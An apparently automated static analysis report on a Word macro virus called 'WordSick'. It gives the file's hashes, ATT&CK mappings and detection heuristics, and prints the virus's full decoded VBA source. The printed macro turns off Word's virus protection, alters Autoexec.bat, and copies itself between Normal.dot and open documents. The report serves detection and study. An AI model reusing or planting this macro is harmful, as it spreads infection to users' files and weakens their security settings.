Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bcda25f5d0e2d7af…

MALICIOUS

Office (OLE)

Size: 27.5 KB
Created: 2000-05-17 22:41:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 4841905eccae2bc98ff0e15fe638af97
SHA-1: d982319465292491ee3cf9dcb0b268685f8f490c
SHA-256: bcda25f5d0e2d7afc8a4b9203a2c1927abeb3df37553c8a02813be0f3c3623ad
Risk Score: 140

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

The sample contains a VBA macro with an AutoClose subroutine, a common technique for executing malicious code when a document is closed. The routine first disables Word's built-in macro virus protection and the save-Normal prompt (Options.VirusProtection and Options.SaveNormalPrompt set to False) and runs under On Error Resume Next, so failures are silently ignored. It then attempts to append 'ECHO Help Me Im Sick' to C:\Autoexec.bat, potentially modifying system startup behavior. Finally, it checks whether the Normal.dot template or the active document lacks the 'WordSick' module, exports its own module to 'c:\WordSick.drv', and imports that file into the uninfected VBA project before saving the document, thereby propagating between the template and documents.

Heuristics 4

  • ClamAV: Doc.Trojan.Fool-11 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Fool-11
  • VBA macros detected (severity: medium, 1 related finding, rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Auto_Close macro (severity: high, rule: OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker (severity: medium, rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the legacy Word macro execution surface; by itself it is not an attribution to a downloader or to a parser CVE.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1542 bytes
SHA-256: b1668b9a45d380d008c75d49d760fb2e10c6b43661ed4b6a70c1d1a11df43d26

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "WordSick"

Sub AutoClose()
    'WordSick Virus v1.00
    'The WaLRuS 05/00
    On Error Resume Next
    Options.ConfirmConversions = False
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
    ActiveDocument.ReadOnlyRecommended = False
    SetAttr "C:\Autoexec.bat", 0
    Open "C:\Autoexec.bat" For Append As #1
    Print #1, "ECHO                    Help Me Im Sick     "
    Close #1
Finish:
If (Second(Now()) > 50) Then Call HelpCall
    Set Norm = NormalTemplate.VBProject.VBComponents
    Set Doc = ActiveDocument.VBProject.VBComponents
If Norm.Item("WordSick").Name <> "WordSick" Then
    Doc("WordSick").Export "c:\WordSick.drv"
    Set infect = NormalTemplate.VBProject
ElseIf Doc.Item("WordSick").Name <> "WordSick" Then
    Norm("WordSick").Export "c:\WordSick.drv"
    Set infect = ActiveDocument.VBProject
End If
infect.VBComponents.Import ("c:\WordSick.drv")
ActiveDocument.Save
End Sub

Sub HelpCall()
    On Error Resume Next
    MsgBox "Please Help Me Im Sick", vbInformation
    Assistant.Visible = True
    With Assistant.NewBalloon
    .Icon = msoIconAlert
    .Text = "Please Help Me Im Sick"
    .Heading = "HELP"
    .Show
    End With
End Sub